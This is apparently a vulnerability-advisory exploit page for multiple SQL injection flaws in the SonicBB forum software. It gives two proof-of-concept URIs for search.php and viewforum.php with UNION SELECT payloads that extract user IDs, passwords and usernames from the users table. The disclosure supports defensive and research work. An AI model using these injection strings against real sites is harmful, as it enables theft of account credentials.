• info
• discussion
• exploit
• solution
• references

SonicBB Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/

http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23